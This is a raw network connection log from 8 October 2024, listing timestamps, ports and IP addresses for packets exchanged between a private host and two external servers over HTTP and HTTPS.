Oct 8, 2024 20:47:31.691163063 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.691163063 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.691180944 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.691189051 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.691193104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.691204071 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.691222906 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.691241026 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.691365957 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.691376925 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.691392899 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.691401958 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.691423893 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.691431046 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.691462994 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.691492081 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.691503048 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.691512108 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.691530943 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.691540956 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.691561937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.691756964 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.691790104 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.691803932 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.691824913 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.691828966 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.691859007 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.691873074 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.691893101 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.691899061 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.691926003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.691936016 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.691962957 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.691994905 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.691998959 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.691998959 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.692025900 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.692042112 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.692063093 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.692078114 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.692107916 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.692203999 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.692235947 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.692250013 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.692270041 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.692285061 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.692305088 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.692306042 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.692339897 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.692349911 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.692373037 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.692384005 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.692409039 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.692421913 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.692441940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.692450047 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.692475080 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.692483902 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.692507982 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.692517042 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.692552090 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.692560911 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.692594051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.692605972 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.692626953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.692637920 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.692661047 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.692670107 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.692693949 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.692704916 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.692728043 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.692738056 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.692760944 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.692771912 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.692796946 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.692802906 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.692847013 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.693152905 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.693185091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.693212032 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.693219900 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.693223953 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.693248987 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.693264008 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.693283081 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.693298101 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.693315983 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.693327904 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.693350077 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.693360090 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.693382978 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.693391085 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.693416119 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.693424940 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.693449020 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.693459034 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.693480968 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.693492889 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.693516016 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.693531036 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.693548918 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.693562031 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.693582058 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.693593979 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.693614006 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.693625927 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.693648100 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.693659067 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.693681002 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.693692923 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.693717003 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.693723917 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.693744898 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.693758011 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.693782091 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.693794012 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.693814039 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.693828106 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.693860054 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.693929911 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.693963051 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.693970919 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.693995953 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.694006920 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.694030046 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.694041967 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.694076061 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.694087982 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.694111109 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.694120884 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.694144011 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.694160938 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.694179058 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.694190979 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.694212914 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.694224119 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.694247007 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.694282055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.694283962 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.694283962 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.694325924 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.694505930 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.694539070 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.694552898 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.694574118 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.694586039 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.694607973 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.694614887 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.694642067 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.694657087 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.694674969 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.694685936 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.694709063 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.694721937 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.694742918 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.694753885 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.694777012 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.694786072 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.694811106 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.694823027 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.694849968 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.694859982 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.694884062 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.694894075 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.694916964 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.694927931 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.694952965 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.694961071 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.694997072 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.714426041 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.714482069 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.714591980 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.714622021 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.714644909 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.714664936 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.714673042 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.714723110 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.714725018 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.714772940 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.714776993 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.714808941 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.714823961 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.714842081 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.714855909 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.714875937 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.714890003 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.714912891 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.714925051 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.714962006 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.714994907 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.715027094 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.715046883 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.715059996 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.715071917 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.715094090 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.715106010 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.715127945 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.715138912 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.715161085 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.715173960 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.715209961 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.715213060 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.715246916 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.715262890 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.715281963 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.715295076 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.715329885 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.722826958 CEST	443	49826	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.723335981 CEST	49826	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.723404884 CEST	443	49826	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.723531961 CEST	443	49825	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.723846912 CEST	49826	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.723860979 CEST	443	49826	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.723927975 CEST	49825	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.723942995 CEST	443	49825	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.724297047 CEST	49825	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.724307060 CEST	443	49825	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.726871967 CEST	443	49827	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.727209091 CEST	49827	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.727231026 CEST	443	49827	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.727591991 CEST	49827	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.727602959 CEST	443	49827	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.728624105 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.734400034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.822968960 CEST	443	49826	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.823033094 CEST	443	49826	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.823093891 CEST	49826	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.823132992 CEST	443	49826	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.823160887 CEST	443	49826	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.823215008 CEST	49826	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.823297977 CEST	49826	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.823297977 CEST	49826	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.823333025 CEST	443	49826	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.823354006 CEST	443	49826	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.825596094 CEST	49830	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.825661898 CEST	443	49830	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.825742006 CEST	49830	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.831201077 CEST	443	49827	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.831960917 CEST	443	49827	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.832035065 CEST	49827	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.832530022 CEST	49830	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.832570076 CEST	443	49830	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.832748890 CEST	49827	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.832748890 CEST	49827	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.832768917 CEST	443	49827	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.832788944 CEST	443	49827	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.834479094 CEST	49831	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.834497929 CEST	443	49831	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.834557056 CEST	49831	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.834652901 CEST	49831	443	192.168.2.5	13.107.246.60
Oct 8, 2024 20:47:31.834662914 CEST	443	49831	13.107.246.60	192.168.2.5
Oct 8, 2024 20:47:31.933222055 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.933259964 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.933315039 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.933347940 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.933382034 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.933404922 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.933404922 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.933404922 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.933404922 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.933414936 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.933434010 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.933463097 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.933468103 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.933496952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.933517933 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.933545113 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.933548927 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.933581114 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.933592081 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.933614016 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.933629036 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.933646917 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.933660984 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.933693886 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.933700085 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.933732986 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.933747053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.933765888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.933783054 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.933816910 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.933818102 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.933846951 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.933864117 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.933882952 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.933893919 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.933921099 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.933931112 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.933954954 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.933971882 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.933988094 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.934004068 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.934026957 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.934040070 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.934062004 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.934073925 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.934109926 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.934235096 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.934267044 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.934283018 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.934299946 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.934314966 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.934334040 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.934346914 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.934366941 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.934381962 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.934400082 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.934417009 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.934437037 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.934452057 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.934469938 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.934479952 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.934504032 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.934519053 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.934537888 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.934550047 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.934585094 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.934736967 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.934768915 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.934793949 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.934803009 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.934817076 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.934837103 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.934851885 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.934870958 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.934890032 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.934902906 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.934921980 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.934936047 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.934957981 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.934971094 CEST	80	49755	95.164.90.97	192.168.2.5
Oct 8, 2024 20:47:31.934990883 CEST	49755	80	192.168.2.5	95.164.90.97
Oct 8, 2024 20:47:31.935003042 CEST	80	49755	95.164.90.97	192.168.2.5
